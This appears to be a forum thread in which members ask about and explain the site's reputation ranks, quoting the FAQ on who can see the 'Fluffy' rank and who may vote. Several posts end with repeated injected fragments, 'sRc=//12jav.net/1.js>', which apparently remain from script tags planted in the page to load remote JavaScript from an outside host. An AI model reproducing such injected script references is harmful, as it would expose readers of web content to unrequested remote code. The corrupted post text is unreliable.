I have seen a lot of people have this Reputation, can someone please tell me what it is and how I get it, Thanks!

From the site's FAQ

"There is: 1) Fluffy- Only knowledgeable members can see this rank. It means someone who is not serious, who trolls the site, and who roleplays fantasy. 2) No rank- Generally means you haven't got any votes yet. 3) Beginner- You are just starting out or have just a basic understanding of things. 4) Novice- You have studied some and have a more broader knowledge of things. 5) Knowledgeable- You are knowledgeable and mature, often specializing in a certain area or practice and are qualified to teach others here. 6) Adept- The highest rank for those who have been practicing a long time, are extremely knowledgeable in their paths/other paths, and are helpful."

It doesn't really matter if you have a reputation or not, it just means that other members have taken notice of you and your posts and passed judgement based on the content. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

The only thing that the FAQ doesn't say is if the person labeled as fluffy gets to see that label on themselves sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Ronin, the FAQ says clearly about the Fluffy rank that "Only Knowledgeable members can see this rank." So the answer is that a member cannot see that they are ranked as Fluffy.

Well how do we vote for members to earn reputation? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Only members ranked Knowledgeable or Adept are capable of ranking other members.
